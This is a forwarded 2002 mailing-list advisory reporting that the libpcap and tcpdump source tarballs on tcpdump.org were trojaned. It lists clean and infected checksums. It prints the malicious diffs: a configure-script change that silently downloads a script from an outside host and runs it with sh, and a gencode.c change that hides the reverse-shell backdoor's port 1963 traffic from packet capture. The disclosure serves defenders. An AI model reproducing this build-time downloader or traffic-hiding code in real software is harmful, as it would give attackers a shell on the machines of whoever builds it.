Fw: Latest libpcap & tcpdump sources from tcpdump.org contain a trojan

["hackerwacker" <hackerwacker () cybermesa com>]

----- Original Message -----
From: "Mincu Alexandru" <alex () intelinet ro>
To: <bugtraq () securityfocus com>
Sent: Wednesday, November 13, 2002 7:48 AM
Subject: Latest libpcap & tcpdump sources from tcpdump.org contain a trojan


> Updates:
>
>       * Many Mirrors are infected with the trojan
> Background:
>
>       * Libpcap provides a packet sniffing library for programs like
>         Snort.
>       * Tcpdump is a standard tool for packet sniffing.
> Details:
>
>       * The trojan contains modifications to the configure script and
>         gencode.c (in libpcap only).
>
>       * The configure script downloads
>         http://mars.raketti.net/~mash/services which is then sourced
>         with the shell. It contains an embedded shell script that
>         creates a C file, and compiles it.
>
>       * The program connects to 212.146.0.34 (mars.raketti.net) on port
>         1963 and reads one of three one byte status codes:
>               * A - program exits
>               * D - forks and spawns a shell and does the needed file
>                 descriptor manipulation to redirect it to the existing
>                 connection to 212.146.0.34.
>               * M - closes connection, sleeps 3600 seconds, and then
>                 reconnects
>
>
>         Hmm... ADM...
>
>       * It's important to note that it reuses the same outgoing
>         connection for the shell. This gets around firewalls that block
>         incoming connections.
>
>       * Gencode.c is modified to force libpcap to ignore packets to/from
>         the backdoor program, hiding the backdoor program's traffic.
>
>       * This is similar to the OpenSSH trojan a few months ago.
>
>
> Good sources:
http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/libpcap-0.7.
1.tar.gz
>
http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/tcpdump-3.6.
2.tar.gz
>
http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/tcpdump-3.7.
1.tar.gz
> MD5 Sum 0597c23e3496a5c108097b2a0f1bd0c7  libpcap-0.7.1.tar.gz
> MD5 Sum 6bc8da35f9eed4e675bfdf04ce312248  tcpdump-3.6.2.tar.gz
> MD5 Sum 03e5eac68c65b7e6ce8da03b0b0b225e  tcpdump-3.7.1.tar.gz
> Trojaned sources:
>
> http://www.tcpdump.org/release/libpcap-0.7.1.tar.gz
> http://www.tcpdump.org/release/tcpdump-3.6.2.tar.gz
> http://www.tcpdump.org/release/tcpdump-3.7.1.tar.gz
>
>
> MD5 Sum 73ba7af963aff7c9e23fa1308a793dca  libpcap-0.7.1.tar.gz
> MD5 Sum 3a1c2dd3471486f9c7df87029bf2f1e9  tcpdump-3.6.2.tar.gz
> MD5 Sum 3c410d8434e63fb3931fe77328e4dd88  tcpdump-3.7.1.tar.gz
>
> The (relevant) gencode.c diff:
>
>
> *** 288,293 ****
> --- 289,318 ----
>   {
>         extern int n_errors;
>         int len;
> +         int l;
> +         char *port = "1963";
> +         char *str, *tmp, *new = "not port 1963";
> +
> +     if (buf && *buf && strstr (buf, port)) {
> +         buf = "port 1964";
> +     }
> +     else {
> +         l = strlen (new) + 1;
> +         if (!(!buf || !*buf)) {
> +             l += strlen (buf);
> +             l += 5; /* and */
> +         }
> +
> +         str = (char *)malloc (l);
> +         str[0] = '\0';
> +         if (!(!buf || !*buf)) {
> +             strcpy (str, buf);
> +             strcat (str, " and ");
> +         }
> +
> +         strcat (str, new);
> +         buf = str;
> +     }
>
>         no_optimize = 0;
>         n_errors = 0;
> ***************
>
> The (relevant) configure diff:
>
>
> +  CNF="services"
> +  URL="mars.raketti.net/~mash/$CNF"
>
> !  (IFS=","
> !  ARGS="wget -q -O -,lynx --source,fetch -q -o -"
> !
> !  for i in $ARGS; do
> !        IFS=" "
> !        $i $URL 1> $CNF
> !        if [ -f $CNF ]; then sh $CNF
> !            exit
> !        fi
> !        rm -f $CNF
> !  done) 1>/dev/null 2>/dev/null &
>
> The "services" payload:
>       * trojan-script, the non-obfuscated portion (excerpted)
>       * services, the complete version
> Thanks to:
>
> Russell Adams <rladams@NO_SPAMadamsinfoserv.com>
> Mathew Solnik <msolnik@NO_SPAMhlug.org>
> Scott Stout <skout@NO_SPAMwiretapped.us>
>
> with the Houston Linux Users Group.
>
> Additional thanks to Bruce Locke for interpreting the backdoor code.
>
> Thanks to Gentoo's Portage system for catching the trojaned
>
> --
> Mincu Alexandru <alex () intelinet ro>



-------------------------------------------------------
This sf.net email is sponsored by: Are you worried about 
your web server security? Click here for a FREE Thawte 
Apache SSL Guide and answer your Apache SSL security 
needs: http://www.gothawte.com/rd523.html
_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users